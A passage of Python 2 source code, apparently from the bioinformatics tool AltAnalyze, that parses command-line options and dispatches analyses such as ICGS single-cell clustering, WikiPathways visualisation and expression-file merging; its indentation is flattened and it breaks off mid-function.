#python AltAnalyze.py --species Mm --arraytype "3'array" --celdir "C:/CEL" --output "C:/CEL" --expname miR1_column --runGOElite yes --GEelitepval 0.01
#python AltAnalyze.py --species Hs --arraytype "3'array" --FEdir "C:/FEfiles" --output "C:/FEfiles" --channel_to_extract "green/red ratio" --expname cancer --runGOElite yes --GEelitepval 0.01
#python AltAnalyze.py --celdir "C:/CEL" --output "C:/CEL" --expname miR1_column
#open ./AltAnalyze.app --celdir "/Users/nsalomonis/Desktop" --output "/Users/nsalomonis/Desktop" --expname test
#python AltAnalyze.py --species Mm --arraytype "3'array" --expdir "C:/CEL/ExpressionInput/exp.miR1_column.txt" --output "C:/CEL" --runGOElite yes --GEelitepval 0.01
#python AltAnalyze.py --species Mm --platform RNASeq --bedDir "/Users/nsalomonis/Desktop/code/AltAnalyze/datasets/BedFiles" --groupdir "/Users/nsalomonis/Desktop/code/AltAnalyze/datasets/BedFiles/ExpressionInput/groups.test.txt" --compdir "/Users/nsalomonis/Desktop/code/AltAnalyze/datasets/BedFiles/ExpressionInput/comps.test.txt" --output "/Users/nsalomonis/Desktop/code/AltAnalyze/datasets/BedFiles" --expname "test"
#python AltAnalyze.py --species Mm --platform RNASeq --filterdir "/Users/nsalomonis/Desktop/code/AltAnalyze/datasets/BedFiles/" --output "/Users/nsalomonis/Desktop/code/AltAnalyze/datasets/BedFiles"
#python AltAnalyze.py --expdir "/Users/nsalomonis/Desktop/Nathan/ExpressionInput/exp.test.txt" --exonMapFile "/Users/nsalomonis/Desktop/Nathan/hgu133_probe.txt" --species Hs --platform "3'array" --output "/Users/nsalomonis/Desktop/Nathan"
#python AltAnalyze.py --species Hs --platform "3'array" --expname test --channelToExtract green --FEdir /Users/saljh8/Downloads/AgllentTest/ --output /Users/saljh8/Downloads/AgllentTest/
global apt_location; global root_dir; global probability_statistic; global log_file; global summary_data_db; summary_data_db={}
###required
marker_finder='no'
manufacturer='Affymetrix'
constitutive_source='Ensembl'
ensembl_version = 'current'
species_code = None
species = None
main_input_folder = None
output_dir = None
array_type = None
input_annotation_file = None
groups_file = None
comps_file = None
input_cdf_file = None
exp_name = None
run_GOElite = 'yes'
visualize_qc_results = 'yes'
run_lineage_profiler = 'yes'
input_exp_file = ''
cel_file_dir = ''
input_stats_file = ''
input_filtered_dir = ''
external_annotation_dir = ''
xhyb_remove = 'no'
update_method = []
update_dbs = 'no'
analyze_all_conditions = 'no'
return_all = 'no'
additional_array_types = []
remove_intronic_junctions = 'no'
ignore_built_species = 'no'
build_exon_bedfile = 'no'
compendiumType = 'protein_coding'
probability_statistic = 'unpaired t-test'
specific_array_type = None
additional_resources = [None]
wpid = None
mod = 'Ensembl'
transpose = False
input_file_dir = None
denom_file_dir = None
image_export = []
selected_species = ['Hs','Mm','Rn'] ### These are the species that additional array types are currently supported
selected_platforms = ['AltMouse','exon','gene','junction']
returnPathways = 'no'
compendiumPlatform = 'gene'
exonMapFile = None
platformType = None ### This option is used to store the orignal platform type
perform_alt_analysis = 'no'
mappedExonAnalysis = False ### Map the original IDs to the RNA-Seq exon database (when True)
microRNA_prediction_method = None
pipelineAnalysis = True
OntologyID=''
PathwaySelection=''
GeneSetSelection=''
interactionDirs=[]
inputType='ID list'
Genes=''; genes=''
degrees='direct'
includeExpIDs=True
update_interactions=False
data_type = 'raw expression'
batch_effects = 'no'
channel_to_extract = None
normalization = False
justShowTheseIDs = ''
display=False
accessoryAnalysis=''
modelSize=None
geneModel=False
run_from_scratch = None
systemToUse = None ### For other IDs
custom_reference = False
multiThreading = True
genesToReport = 60
correlateAll = True
expression_data_format='log'
runICGS=False
IDtype=None
runKallisto = False
input_fastq_dir = ''
ChromiumSparseMatrix=''
perform_tests=False
testType = "fast"
inputTestData = "text"
customFASTA = None
filterFile = None
PearsonThreshold = 0.1
returnCentroids = 'community'
runCompleteWorkflow=True
referenceFull=None
k=None
labels=None
original_arguments = sys.argv
arguments=[]
for arg in original_arguments:
arg = string.replace(arg,'\xe2\x80\x9c','') ### These are non-standard forward quotes
arg = string.replace(arg,'\xe2\x80\x9d','') ### These are non-standard reverse quotes
arg = string.replace(arg,'\xe2\x80\x93','-') ### These are non-standard dashes
arg = string.replace(arg,'\x96','-') ### These are non-standard dashes
arg = string.replace(arg,'\x93','') ### These are non-standard forward quotes
arg = string.replace(arg,'\x94','') ### These are non-standard reverse quotes
arguments.append(arg)
print '\nArguments input:',arguments,'\n'
if '--help' in arguments[1:] or '--h' in arguments[1:]:
try: displayHelp() ### Print out a help file and quit
except Exception: print 'See: http://www.altanalyze.org for documentation and command-line help';sys.exit()
if 'AltAnalyze' in arguments[1]:
arguments = arguments[1:] ### Occurs on Ubuntu with the location of AltAnalyze being added to sys.argv (exclude this since no argument provided for this var)
try:
options, remainder = getopt.getopt(arguments[1:],'', ['species=', 'mod=','elitepval=', 'elitepermut=',
'method=','zscore=','pval=','num=',
'runGOElite=','denom=','output=','arraytype=',
'celdir=','expdir=','output=','statdir=',
'filterdir=','cdfdir=','csvdir=','expname=',
'dabgp=','rawexp=','avgallss=','logexp=',
'inclraw=','runalt=','altmethod=','altp=',
'probetype=','altscore=','GEcutoff=',
'exportnormexp=','calcNIp=','runMiDAS=',
'GEcutoff=','GEelitepval=','mirmethod=','ASfilter=',
'vendor=','GEelitefold=','update=','version=',
'analyzeAllGroups=','GEeliteptype=','force=',
'resources_to_analyze=', 'dataToAnalyze=','returnAll=',
'groupdir=','compdir=','annotatedir=','additionalScore=',
'additionalAlgorithm=','noxhyb=','platform=','bedDir=',
'altpermutep=','altpermute=','removeIntronOnlyJunctions=',
'normCounts=','buildExonExportFile=','groupStat=',
'compendiumPlatform=','rpkm=','exonExp=','specificArray=',
'ignoreBuiltSpecies=','ORAstat=','outputQCPlots=',
'runLineageProfiler=','input=','image=', 'wpid=',
'additional=','row_method=','column_method=',
'row_metric=','column_metric=','color_gradient=',
'transpose=','returnPathways=','compendiumType=',
'exonMapFile=','geneExp=','labels=','contrast=',
'plotType=','geneRPKM=','exonRPKM=','runMarkerFinder=',
'update_interactions=','includeExpIDs=','degrees=',
'genes=','inputType=','interactionDirs=','GeneSetSelection=',
'PathwaySelection=','OntologyID=','dataType=','combat=',
'channelToExtract=','showIntrons=','display=','join=',
'uniqueOnly=','accessoryAnalysis=','inputIDType=','outputIDType=',
'FEdir=','channelToExtract=','AltResultsDir=','geneFileDir=',
'AltResultsDir=','modelSize=','geneModel=','reference=',
'multiThreading=','multiProcessing=','genesToReport=',
'correlateAll=','normalization=','justShowTheseIDs=',
'direction=','analysisType=','algorithm=','rho=',
'clusterGOElite=','geneSetName=','runICGS=','IDtype=',
'CountsCutoff=','FoldDiff=','SamplesDiffering=','removeOutliers=',
'featurestoEvaluate=','restrictBy=','ExpressionCutoff=',
'excludeCellCycle=','runKallisto=','fastq_dir=','FDR=',
'reimportModelScores=','separateGenePlots=','ChromiumSparseMatrix=',
'test=','testType=','inputTestData=','customFASTA=','i=',
'excludeGuides=','cellHarmony=','BAM_dir=','filterFile=',
'correlationCutoff=','referenceType=','DE=','cellHarmonyMerge=',
'o=','dynamicCorrelation=','runCompleteWorkflow=','adjp=',
'fold=','performDiffExp=','centerMethod=', 'k=','bamdir=',
'downsample=','query=','referenceFull=', 'maskGroups=',
'elite_dir=','numGenesExp='])
except Exception:
print traceback.format_exc()
print "There is an error in the supplied command-line arguments (each flag requires an argument)"; sys.exit()
for opt, arg in options:
#print [opt, arg]
if opt == '--species': species=arg
elif opt == '--arraytype':
if array_type != None: additional_array_types.append(arg)
else: array_type=arg; platform = array_type
if specific_array_type == None: specific_array_type = platform
elif opt == '--test':
try: perform_tests.append(arg)
except Exception: perform_tests = [arg]
elif opt == '--testType':
testType = arg
elif opt == '--inputTestData':
inputTestData = arg
elif opt == '--exonMapFile':
perform_alt_analysis = 'yes' ### Perform alternative exon analysis
exonMapFile = arg
elif opt == '--specificArray': specific_array_type = arg ### e.g., hGlue
elif opt == '--celdir':
arg = verifyPath(arg)
cel_file_dir=arg
elif opt == '--bedDir' or opt == '--BAM_dir' or opt == 'bamdir=' or opt == 'bamDir':
arg = verifyPath(arg)
cel_file_dir=arg
elif opt == '--ChromiumSparseMatrix':
arg = verifyPath(arg)
ChromiumSparseMatrix=arg
elif opt == '--FEdir':
arg = verifyPath(arg)
cel_file_dir = arg
elif opt == '--expdir':
arg = verifyPath(arg)
input_exp_file=arg
elif opt == '--statdir':
arg = verifyPath(arg)
input_stats_file=arg
elif opt == '--filterdir':
arg = verifyPath(arg)
input_filtered_dir=arg
elif opt == '--groupdir':
arg = verifyPath(arg)
groups_file=arg
elif opt == '--compdir':
arg = verifyPath(arg)
comps_file=arg
elif opt == '--cdfdir':
arg = verifyPath(arg)
input_cdf_file=arg
elif opt == '--csvdir':
arg = verifyPath(arg)
input_annotation_file=arg
elif opt == '--expname': exp_name=arg
elif opt == '--output' or opt == '--o':
arg = verifyPath(arg)
output_dir=arg
elif opt == '--vendor': manufacturer=arg
elif opt == '--runICGS': runICGS=True
elif opt == '--IDtype': IDtype=arg
elif opt == '--ignoreBuiltSpecies': ignore_built_species=arg
elif opt == '--platform':
if array_type != None: additional_array_types.append(arg)
else: array_type=arg; platform = array_type
if specific_array_type == None: specific_array_type = platform
elif opt == '--update': update_dbs='yes'; update_method.append(arg)
elif opt == '--version': ensembl_version = arg
elif opt == '--compendiumPlatform': compendiumPlatform=arg ### platform for which the LineageProfiler compendium is built on
elif opt == '--force': force=arg
elif opt == '--input' or opt == '--i' or opt == '--query':
arg = verifyPath(arg)
input_file_dir=arg
#input_exp_file=arg
pipelineAnalysis = False ### If this option is entered, only perform the indicated analysis
elif opt == '--image': image_export.append(arg)
elif opt == '--wpid': wpid=arg
elif opt == '--mod': mod=arg
elif opt == '--runKallisto':
if arg == 'yes' or string.lower(arg) == 'true':
runKallisto = True
elif opt == '--fastq_dir':
input_fastq_dir = arg
elif opt == '--customFASTA':
customFASTA = arg
elif opt == '--additional':
if additional_resources[0] == None:
additional_resources=[]
additional_resources.append(arg)
else:
additional_resources.append(arg)
elif opt == '--transpose':
if arg == 'True': transpose = True
elif opt == '--runLineageProfiler' or opt == '--cellHarmony': ###Variable declared here and later (independent analysis here or pipelined with other analyses later)
run_lineage_profiler=arg
elif opt == '--compendiumType': ### protein-coding, ncRNA, or exon
compendiumType=arg
elif opt == '--denom':
denom_file_dir=arg ### Indicates that GO-Elite is run independent from AltAnalyze itself
elif opt == '--accessoryAnalysis':
accessoryAnalysis = arg
elif opt == '--channelToExtract': channel_to_extract=arg
elif opt == '--genesToReport': genesToReport = int(arg)
elif opt == '--correlateAll': correlateAll = True
elif opt == '--direction': direction = arg
elif opt == '--logexp': expression_data_format=arg
elif opt == '--geneRPKM': rpkm_threshold=arg
elif opt == '--correlationCutoff': PearsonThreshold=float(arg)
elif opt == '--DE':
if string.lower(arg) == 'true':
DE = True
else:
DE = False
elif opt == '--referenceType':
if string.lower(arg) == 'centroid' or string.lower(arg) == 'mean':
returnCentroids = True; CenterMethod='centroid'
elif string.lower(arg) == 'medoid' or string.lower(arg) == 'median':
returnCentroids = True; CenterMethod='median'
elif string.lower(arg) == 'community' or string.lower(arg) == 'louvain':
returnCentroids = 'community'; CenterMethod='community'
elif string.lower(arg) == 'cells' or string.lower(arg) == 'cell':
returnCentroids = False; CenterMethod='centroid'
else:
returnCentroids = 'community'; CenterMethod='community'
elif opt == '--multiThreading' or opt == '--multiProcessing':
multiThreading=arg
if multiThreading == 'yes': multiThreading = True
elif 'rue' in multiThreading: multiThreading = True
else: multiThreading = False
if perform_tests != False:
### Requires the mouse RNASeq database
### python AltAnalyze.py --test --testType ICGS --inputTestData text
### python AltAnalyze.py --test --testType ICGS --inputTestData BAM
### python AltAnalyze.py --test --testType ICGS --inputTestData FASTQ
### python AltAnalyze.py --test --testType ICGS --inputTestData 10X
count = verifyFileLength('AltDatabase/demo_data/ReadMe.txt')
if count==0:
file_location_defaults = UI.importDefaultFileLocations()
goelite_url = file_location_defaults['goelite'].Location()
fln,status = update.download(goelite_url+'TestData/demo_data.zip','AltDatabase/NoVersion','')
if 'Internet' not in status: print "Demo data downloaded."
if 'ICGS' in perform_tests:
from tests.scripts import ICGS_test
if runKallisto:
inputTestData = "FASTQ"
ICGS_test.runICGStest(testType=testType,inputData=inputTestData)
sys.exit()
if 'other' in manufacturer or 'Other' in manufacturer:
### For other IDs
systemToUse = array_type
if array_type == None:
print 'Please indicate a ID type as --platform when setting vendor equal to "Other IDs"'; sys.exit()
array_type = "3'array"
if array_type == 'RNASeq': manufacturer = array_type
if platformType == None: platformType = array_type
if perform_alt_analysis == 'yes':
if platform == "3'array":
mappedExonAnalysis = True
cel_file_dir = input_exp_file
exp_name = export.findFilename(input_exp_file)
exp_name = string.replace(exp_name,'.txt','')
exp_name = string.replace(exp_name,'exp.','')
input_exp_file = ''
### To perform alternative exon analyses for platforms without a dedicated database, must happing appropriate mapping info or array type data
### (will need to perform downstream testing for unsupported Affymetrix exon, gene and junction arrays)
if exonMapFile == None and specific_array_type == None and cel_file_dir == '':
print_out = "\nUnable to run!!! Please designate either a specific platfrom (e.g., --specificArray hgU133_2), select CEL files, or an "
print_out += "exon-level mapping file location (--exonMapFile C:/mapping.txt) to perform alternative exon analyses for this platform."
### Will need to check here to see if the platform is supported (local or online files) OR wait until an error is encountered later
""" Check to see if a database is already installed """
try: current_species_dirs = unique.read_directory('/AltDatabase')
except Exception: current_species_dirs=[]
if len(current_species_dirs)==0 and update_dbs != 'yes':
print "Please install a database before running AltAnalyze. Please note, AltAnalyze may need to install additional files later for RNASeq and LineageProfiler for some species, automatically. Make sure to list your platform as RNASeq if analyzing RNA-Seq data (--platform RNASeq)."
print "Example:\n"
print 'python AltAnalyze.py --species Hs --update Official --version EnsMart72';sys.exit()
######## Perform analyses independent from AltAnalyze database centric analyses that require additional parameters
if len(image_export) > 0 or len(accessoryAnalysis)>0 or runICGS:
""" Annotate existing ICGS groups with selected GO-Elite results """
if 'annotateICGS' in accessoryAnalysis:
for opt, arg in options: ### Accept user input for these hierarchical clustering variables
if opt == '--elite_dir':
goelite_path = arg
import RNASeq
RNASeq.predictCellTypesFromClusters(groups_file, goelite_path)
sys.exit()
if runICGS:
#python AltAnalyze.py --runICGS yes --platform "RNASeq" --species Hs --column_method hopach --column_metric euclidean --rho 0.3 --ExpressionCutoff 1 --FoldDiff 4 --SamplesDiffering 3 --restrictBy protein_coding --excludeCellCycle conservative --removeOutliers yes --expdir /RNA-Seq/run1891_normalized.txt
#python AltAnalyze.py --runICGS yes --expdir "/Users/saljh8/Desktop/demo/Myoblast/ExpressionInput/exp.myoblast.txt" --platform "3'array" --species Hs --GeneSetSelection BioMarkers --PathwaySelection Heart --column_method hopach --rho 0.4 --ExpressionCutoff 200 --justShowTheseIDs "NKX2-5 T TBX5" --FoldDiff 10 --SamplesDiffering 3 --excludeCellCycle conservative
try: species = species
except Exception: 'Please designate a species before continuing (e.g., --species Hs)'
try: array_type = array_type
except Exception: 'Please designate a species before continuing (e.g., --species Hs)'
if len(cel_file_dir)>0: ### For BED files or BAM files
if len(cel_file_dir) > 0: pass
else: 'Please indicate a source folder (e.g., --bedDir /data/BAMFiles)'
else:
if len(input_exp_file) > 0: pass
else: 'Please indicate a source folder or expression file (e.g., --expdir /dataset/singleCells.txt)'
if array_type == 'Other' or 'Other' in array_type:
if ':' in array_type:
array_type, IDtype = string.split(array_type)
array_type == "3'array"
if IDtype == None: IDtype = manufacturer
row_method = 'hopach'
column_method = 'hopach'
row_metric = 'cosine'
column_metric = 'cosine'
color_gradient = 'yellow_black_blue'
contrast=3
vendor = manufacturer
GeneSelection = ''
PathwaySelection = ''
GeneSetSelection = 'None Selected'
excludeCellCycle = True
rho_cutoff = 0.2
restrictBy = None
featurestoEvaluate = 'Genes'
ExpressionCutoff = 1
CountsCutoff = 0.9
FoldDiff = 4
SamplesDiffering = 4
JustShowTheseIDs=''
removeOutliers = False
excludeGuides = None
PathwaySelection=[]
dynamicCorrelation=True
runCompleteWorkflow=False
downsample=2500
numGenesExp=500
if ChromiumSparseMatrix != '':
rho_cutoff = 0.2
column_metric = 'euclidean'
restrictBy = 'protein_coding'
for opt, arg in options: ### Accept user input for these hierarchical clustering variables
if opt == '--row_method':
row_method=arg
if row_method == 'None': row_method = None
elif opt == '--column_method':
column_method=arg
if column_method == 'None': column_method = None
elif opt == '--row_metric': row_metric=arg
elif opt == '--column_metric': column_metric=arg
elif opt == '--color_gradient': color_gradient=arg
elif opt == '--GeneSetSelection': GeneSetSelection=arg
elif opt == '--PathwaySelection': PathwaySelection.append(arg)
elif opt == '--genes': GeneSelection=arg
elif opt == '--ExpressionCutoff': ExpressionCutoff=arg
elif opt == '--normalization': normalization=arg
elif opt == '--justShowTheseIDs': justShowTheseIDs=arg
elif opt == '--rho': rho_cutoff=float(arg)
elif opt == '--clusterGOElite':clusterGOElite=float(arg)
elif opt == '--CountsCutoff':CountsCutoff=int(float(arg))
elif opt == '--FoldDiff':FoldDiff=float(arg)
elif opt == '--SamplesDiffering':SamplesDiffering=int(float(arg))
elif opt == '--excludeGuides': excludeGuides=arg
elif opt == '--dynamicCorrelation': dynamicCorrelation=arg
elif opt == '--k': k=int(arg)
elif opt == '--downsample': downsample=int(arg)
elif opt == '--numGenesExp': numGenesExp=int(arg)
elif opt == '--runCompleteWorkflow':
runCompleteWorkflow=arg
if string.lower(arg)=='false' or string.lower(arg)=='no':
runCompleteWorkflow = False
else:
runCompleteWorkflow = True
elif opt == '--removeOutliers':
removeOutliers=arg
if removeOutliers=='yes' or removeOutliers=='True':
removeOutliers = True
elif opt == '--featurestoEvaluate':featurestoEvaluate=arg
elif opt == '--restrictBy':
if arg == 'None': restrictBy = None
else: restrictBy=arg
elif opt == '--excludeCellCycle':
excludeCellCycle=arg
if excludeCellCycle == 'False' or excludeCellCycle == 'no': excludeCellCycle = False
elif excludeCellCycle == 'True' or excludeCellCycle == 'yes' or excludeCellCycle == 'conservative': excludeCellCycle = True
elif opt == '--contrast':
try: contrast=float(arg)
except Exception: print '--contrast not a valid float';sys.exit()
elif opt == '--vendor': vendor=arg
elif opt == '--display':
if arg=='yes':
display=True
elif arg=='True':
display=True
else:
display=False
if excludeGuides!=None:
if '.txt' in excludeGuides:
try: excludeGuides = parseExcludeGuides(excludeGuides)
except Exception:
print 'Failure to parse input excludeGuides text file. Check to see if the correct file location is provided.'
sys.exit()
if len(PathwaySelection)==0: PathwaySelection=''
if len(GeneSetSelection)>0 or GeneSelection != '':
gsp = UI.GeneSelectionParameters(species,array_type,vendor)
gsp.setGeneSet(GeneSetSelection)
gsp.setPathwaySelect(PathwaySelection)
gsp.setGeneSelection(GeneSelection)
gsp.setJustShowTheseIDs(JustShowTheseIDs)
gsp.setNormalize('median')
gsp.setExcludeGuides(excludeGuides)
gsp.setK(k)
gsp.setDownsample(downsample)
gsp.setNumGenesExp(numGenesExp)
gsp.setSampleDiscoveryParameters(ExpressionCutoff,CountsCutoff,FoldDiff,SamplesDiffering, dynamicCorrelation,
removeOutliers,featurestoEvaluate,restrictBy,excludeCellCycle,column_metric,column_method,rho_cutoff)
import RNASeq
mlp_instance = mlp
if exp_name == None:
exp_name = export.findFilename(input_exp_file)
exp_name = string.replace(exp_name,'.txt','')
exp_name = string.replace(exp_name,'exp.','')
if cel_file_dir != '':
expFile = output_dir + '/ExpressionInput/'+ 'exp.'+exp_name+'.txt' ### cel_file_dir will point to the input directory
elif ChromiumSparseMatrix != '':
expFile = output_dir + '/ExpressionInput/'+ 'exp.'+exp_name+'.txt'
elif input_exp_file !='':
if 'ExpressionInput' in input_exp_file: expFile = input_exp_file
else:
### Copy over expression file to ExpressionInput
expdir2 = string.replace(input_exp_file,'exp.','')
if output_dir == None:
### Not suppplied, define relative to the input expression file
root_dir = export.findParentDir(input_exp_file)
else:
root_dir = output_dir
expFile = root_dir+'/ExpressionInput/exp.'+export.findFilename(expdir2)
export.copyFile(input_exp_file, expFile)
### Groups file if present to the output directory ExpressionInput folder
if 'exp.' in input_exp_file:
initial_groups = string.replace(input_exp_file,'exp.','groups.')
else:
initial_groups = export.findParentDir(input_exp_file)+'/groups.'+export.findFilename(input_exp_file)
try:
groups_file = string.replace(expFile,'exp.','groups.') ### destination file
export.copyFile(initial_groups, groups_file)
print 'Copied the groups file to ExpressionInput folder in the output directory'
except Exception:
print 'No groups file present in the input file folder.'
global log_file
try:
if len(output_dir)>0:
root_dir = output_dir
else:
forceError
except Exception:
try: root_dir = export.findParentDir(expFile)
except Exception:
print 'Please include an output directory for the AltAnalyze results (e.g., --output /Data/Results)';sys.exit()
root_dir = string.replace(root_dir,'/ExpressionInput','')
fl = UI.ExpressionFileLocationData('','','',''); fl.setFeatureNormalization('none')
try: fl.setExpFile(expFile)
except Exception:
expFile = root_dir+'/ExpressionInput/exp.'+exp_name+'.txt'
fl.setExpFile(expFile)
fl.setArrayType(array_type)
fl.setOutputDir(root_dir)
fl.setMultiThreading(multiThreading)
exp_file_location_db={}; exp_file_location_db[exp_name]=fl
### Assign variables needed to run Kallisto from FASTQ files
if runKallisto and len(input_fastq_dir)==0:
#python AltAnalyze.py --runICGS yes --platform "RNASeq" --species Mm --column_method hopach --rho 0.4 --ExpressionCutoff 1 --FoldDiff 4 --SamplesDiffering 1 --excludeCellCycle strict --output /Users/saljh8/Desktop/Grimes/GEC14074 --expname test --fastq_dir /Users/saljh8/Desktop/Grimes/GEC14074
print 'Please include the flag "--fastq_dir" in the command-line arguments with an appropriate path';sys.exit()
elif len(input_fastq_dir)>0:
fl.setRunKallisto(input_fastq_dir)
fl.setArrayType("3'array")
fl.setMultiThreading(multiThreading)
array_type = "3'array"
if customFASTA!=None:
fl.setCustomFASTA(customFASTA)
### Assign variables needed to run BAMtoBED and/or BED file count analysis
if len(cel_file_dir)>0 and array_type=='RNASeq':
#python AltAnalyze.py --runICGS yes --platform "RNASeq" --species Mm --column_method hopach --rho 0.4 --ExpressionCutoff 1 --FoldDiff 4 --SamplesDiffering 1 --excludeCellCycle strict --output /Users/saljh8/Desktop/Grimes/GEC14074 --expname test --bedDir /Users/saljh8/Desktop/Grimes/GEC14074 --multiProcessing no
fl.setCELFileDir(cel_file_dir)
fl.setMultiThreading(multiThreading)
fl.setExonBedBuildStatus('no')
fl.setFeatureNormalization('RPKM')
fl.setArrayType(array_type)
fl.setRootDir(root_dir)
### Import expression defaults
expr_defaults, alt_exon_defaults, functional_analysis_defaults, goelite_defaults = UI.importDefaults(array_type,species)
dabg_p, rpkm_threshold, gene_exp_threshold, exon_exp_threshold, exon_rpkm_threshold, expression_threshold, perform_alt_analysis, analyze_as_groups, expression_data_format, normalize_feature_exp, normalize_gene_data, avg_all_for_ss, include_raw_data, probability_statistic, FDR_statistic, batch_effects, marker_finder, visualize_qc_results, run_lineage_profiler, null = expr_defaults
fl.setRPKMThreshold(rpkm_threshold)
fl.setExonExpThreshold(exon_exp_threshold)
fl.setGeneExpThreshold(gene_exp_threshold)
fl.setExonRPKMThreshold(exon_rpkm_threshold)
fl.setJunctionExpThreshold(expression_threshold)
elif len(ChromiumSparseMatrix)>0:
#python AltAnalyze.py --runICGS yes --platform "RNASeq" --species Mm --column_method hopach --rho 0.4 --ExpressionCutoff 1 --FoldDiff 4 --SamplesDiffering 1 --excludeCellCycle strict --output /Users/saljh8/Desktop/Grimes/GEC14074 --expname test --ChromiumSparseMatrix /Users/saljh8/Desktop/Grimes/GEC14074 --multiProcessing no
fl.setChromiumSparseMatrix(ChromiumSparseMatrix)
fl.setMultiThreading(multiThreading)
fl.setArrayType("3'array")
array_type = "3'array"
fl.setRootDir(root_dir)
elif len(input_exp_file)>0:
### Dealing with an expression file which should not be treated as RNASeq workflow
count = verifyFileLength(expFile[:-4]+'-steady-state.txt')
if count<2:
if array_type != 'PSI' and array_type != 'exons':
array_type = "3'array" ### No steady-state file, must be an standard gene-level analysis
time_stamp = timestamp()
log_file = filepath(root_dir+'/AltAnalyze_report-'+time_stamp+'.log')
log_report = open(log_file,'w'); log_report.close()
sys.stdout = Logger('')
print "\nFull commandline:"
try: print string.join(arguments,' ')
except Exception: pass
print ''
count = verifyFileLength(expFile[:-4]+'-steady-state.txt')
exonExpFile = str(expFile)
if count>1:
expFile = expFile[:-4]+'-steady-state.txt'
elif array_type=='RNASeq' or len(ChromiumSparseMatrix)>0 or len(input_fastq_dir)>0:
try:
### Indicates that the steady-state file doesn't exist. The exp. may exist, be could be junction only so need to re-build from bed files here
values = species,exp_file_location_db,exp_name,mlp_instance
### proceed to run the full discovery analysis here (Kallisto, BAM, BED, Chromium matrix)
UI.StatusWindow(values,'preProcessRNASeq') ### proceed to run the full discovery analysis here!!!
SteadyStateFile = expFile[:-4]+'-steady-state.txt'
status = verifyFile(SteadyStateFile)
if status == "found":
#fl.setExpFile(SteadyStateFile) ### This should not be over-written by a steady-state file
expFile = SteadyStateFile
except Exception:
### RNASeq is an official datatype that requires a steady-state file. However, for scRNA-Seq, usually the input is a text file or FASTQ which gets
### changed to "3'array". We correct for this by excepting this error without doing anything else
#print traceback.format_exc();sys.exit()
pass
if excludeCellCycle != False:
print "Excluding Cell Cycle effects status:",excludeCellCycle
### Run ICGS through the GUI
graphic_links = UI.RemotePredictSampleExpGroups(expFile, mlp_instance, gsp,(species,array_type)) ### proceed to run the full discovery analysis here!!!
### Export Guide3 Groups automatically
Guide3_results = graphic_links[-1][-1][:-4]+'.txt'
new_groups_dir = RNASeq.exportGroupsFromClusters(Guide3_results,fl.ExpFile(),array_type,suffix='ICGS')
exonExpFile,newExpFile,new_groups_dir = UI.exportAdditionalICGSOutputs(expFile,Guide3_results,outputTSNE=True)
fl.setExpFile(newExpFile) ### set this to the outlier removed version
comps_file = string.replace(new_groups_dir,'groups.','comps.')
fl.setGroupsFile(new_groups_dir)
fl.setCompsFile(comps_file)
exp_file_location_db[exp_name+'-ICGS'] = fl
### force MarkerFinder to be run
input_exp_file = newExpFile ### Point MarkerFinder to the new ICGS ordered copied expression file
runMarkerFinder=True ### Not necessary for ICGS2 as MarkerFinder will already have been run - but good for other ICGS outputs
if runMarkerFinder:
update_method = ['markers']
if runCompleteWorkflow == False:
print 'ICGS run complete... halted prior to full differential comparison analysis'
sys.exit()
if 'WikiPathways' in image_export:
#python AltAnalyze.py --input /Users/test/input/criterion1.txt --image WikiPathways --mod Ensembl --species Hs --wpid WP536
if wpid==None:
print 'Please provide a valid WikiPathways ID (e.g., WP1234)';sys.exit()
if species==None:
print 'Please provide a valid species ID for an installed database (to install: --update Official --species Hs --version EnsMart72Plus)';sys.exit()
if input_file_dir==None:
print 'Please provide a valid file location for your input IDs (also needs to inlcude system code and value column)';sys.exit()
from visualization_scripts import WikiPathways_webservice
try:
print 'Attempting to output a WikiPathways colored image from user data'
print 'mod:',mod
print 'species_code:',species
print 'wpid:',wpid
print 'input GO-Elite ID file:',input_file_dir
graphic_link = WikiPathways_webservice.visualizePathwayAssociations(input_file_dir,species,mod,wpid)
except Exception,e:
if 'force_no_matching_error' in traceback.format_exc():
print '\nUnable to run!!! None of the input IDs mapped to this pathway\n'
elif 'IndexError' in traceback.format_exc():
print '\nUnable to run!!! Input ID file does not have at least 3 columns, with the second column being system code\n'
elif 'ValueError' in traceback.format_exc():
print '\nUnable to run!!! Input ID file error. Please check that you do not have extra rows with no data\n'
elif 'source_data' in traceback.format_exc():
print '\nUnable to run!!! Input ID file does not contain a valid system code\n'
elif 'goelite' in traceback.format_exc():
print '\nUnable to run!!! A valid species database needs to first be installed. For example, run:'
print 'python AltAnalyze.py --update Official --species Hs --version EnsMart72\n'
else:
print traceback.format_exc()
print '\nError generating the pathway "%s"' % wpid,'\n'
try:
printout = 'Finished exporting visualized pathway to:',graphic_link['WP']
print printout,'\n'
except Exception: None
sys.exit()
if 'FilterFile' in accessoryAnalysis:
for opt, arg in options: ### Accept user input for these hierarchical clustering variables
if opt == '--filterFile':
filterFile = arg
if opt == '--input':
input_file = verifyPath(arg)
output_file = input_file[:-4]+'-filtered.txt'
from import_scripts import sampleIndexSelection
filter_order = sampleIndexSelection.getFilters(filterFile)
sampleIndexSelection.filterFile(input_file,output_file,filter_order)
sys.exit()
if 'MergeFiles' in accessoryAnalysis:
#python AltAnalyze.py --accessoryAnalysis MergeFiles --input "C:\file1.txt" --input "C:\file2.txt" --output "C:\tables"
files_to_merge=[]
join_option='Intersection'
uniqueOnly=False
for opt, arg in options: ### Accept user input for these hierarchical clustering variables
if opt == '--input':
arg = verifyPath(arg)
files_to_merge.append(arg)
if opt == '--join': join_option = arg
if opt == '--uniqueOnly': unique_only = arg
if len(files_to_merge)<2:
print 'Please designate two or more files to merge (--input)';sys.exit()
UI.MergeFiles(files_to_merge, join_option, uniqueOnly, output_dir, None)
sys.exit()
if 'IDTranslation' in accessoryAnalysis:
#python AltAnalyze.py --accessoryAnalysis IDTranslation --inputIDType Symbol --outputIDType RefSeq --input "C:\file1.txt" --species Hs
inputIDType=None
outputIDType=None
for opt, arg in options: ### Accept user input for these hierarchical clustering variables
if opt == '--inputIDType': inputIDType = arg
if opt == '--outputIDType': outputIDType = arg
if inputIDType==None or outputIDType==None:
print 'Please designate an input ID type and and output ID type (--inputIDType Ensembl --outputIDType Symbol)'; sys.exit()
if species==None:
print "Please enter a valide species (--species)"; sys.exit()
UI.IDconverter(input_file_dir, species, inputIDType, outputIDType, None)
sys.exit()
if 'hierarchical' in image_export:
#python AltAnalyze.py --input "/Users/test/pluri.txt" --image hierarchical --row_method average --column_method single --row_metric cosine --column_metric euclidean --color_gradient red_white_blue --transpose False --PathwaySelection Apoptosis:WP254 --GeneSetSelection WikiPathways --species Hs --platform exon --display false
if input_file_dir==None:
